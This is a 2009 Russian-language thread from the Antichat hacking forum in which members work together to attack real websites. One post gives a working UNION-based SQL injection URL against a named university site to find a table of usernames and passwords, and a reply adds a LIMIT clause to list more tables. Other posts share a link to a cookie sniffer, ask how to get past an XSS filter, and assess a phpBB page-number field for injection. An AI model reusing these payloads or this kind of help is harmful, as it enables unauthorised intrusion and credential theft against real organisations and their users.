HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.01.2009, 00:25
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

ACD или FastStone редактировать EXIF в Image Properties

Последний раз редактировалось Pashkela; 15.01.2009 в 00:27..
 
Ответить с цитированием

  #2  
Старый 15.01.2009, 23:27
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
С нами: 9133681

Репутация: 90
По умолчанию

помогите плиз найти таблицу с юзерами и пассами все облазил нигде не нашел((

http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+fr om+information_schema.tables--

вывод всех таблиц

p.s. Сайт казанского государственного университета
 
Ответить с цитированием

  #3  
Старый 15.01.2009, 01:18
ZEXEL
Постоянный
Регистрация: 07.01.2008
Сообщений: 591
С нами: 9653789

Репутация: 549


По умолчанию

Кто подскажет щас нормально работает сервис по сниферам http://na-s.ru/ ?
А то почему то мне логи не проходят
 
Ответить с цитированием

  #4  
Старый 15.01.2009, 02:04
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Свой снифак давно надо юзать, вот, от каника:

http://pashkela.narod.ru/sniffer.rar
 
Ответить с цитированием

  #5  
Старый 15.01.2009, 11:52
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

XSS
Что можно попробовать если фильтр сжирает </script>
 
Ответить с цитированием

  #6  
Старый 15.01.2009, 11:57
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию

http://www.inattack.ru/article/519.html
 
Ответить с цитированием

  #7  
Старый 16.01.2009, 00:07
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами: 9477026

Репутация: 2362
По умолчанию

pinky07, используй limit в запросах:
http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+30,20--

а то там скрипт только 20 таблиц выдает.
 
Ответить с цитированием

  #8  
Старый 16.01.2009, 17:52
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

здрасти, собрался ставить булку так вот интересует вопрос как поставить фиксы на хаки(эксплоиты) или же надо самим в ручную капаца в php коде и вправлять?
 
Ответить с цитированием

  #9  
Старый 16.01.2009, 17:57
.zGA
Banned
Регистрация: 11.01.2009
Сообщений: 3
С нами: 9121286

Репутация: 5
По умолчанию

самому менять или ставить зафиксеные хаки
 
Ответить с цитированием

  #10  
Старый 16.01.2009, 18:30
Qam
Познающий
Регистрация: 16.01.2009
Сообщений: 40
С нами: 9114128

Репутация: 15
По умолчанию

Вобщем помогите мне в таком вопрсе,есть поле для ввода в форуме при вводе числа в которое ты переходишь на страницу число которой ты написал в этом поле,но если в это поле вписать капострофу,тоесть одиночную кавычку то MySQL выдаёт синтаксическую ошибку вообщем вот "Общая ошибка

Could not obtain post/user information.

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3, 3' at line 8

SELECT u.username, u.user_id, u.user_level, u.user_posts, u.user_nic_color, u.user_allowsmile, u.user_allow_viewonline, u.user_session_time, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid, u.user_reputation, u.user_reputation_plus, u.user_warnings, u.user_level FROM phpbb_posts p, phpbb_users u, phpbb_posts_text pt WHERE p.topic_id = 1 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time DESC LIMIT -3, 3

Line : 449
File : viewtopic.php"
Возможно ли здесь провисти скуль инъекцию!?Вызывает сомнение то что отрываю исходный тест то вижу это <br/>Стр.<input type="text" name="start1" size="3" value="3"><input type="submit" value="&gt;&gt;"/></form></p> тоесть в это поле можно вести только 3 символа!!Стоит ли пробывать провести скуль инъекцию или нет??
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.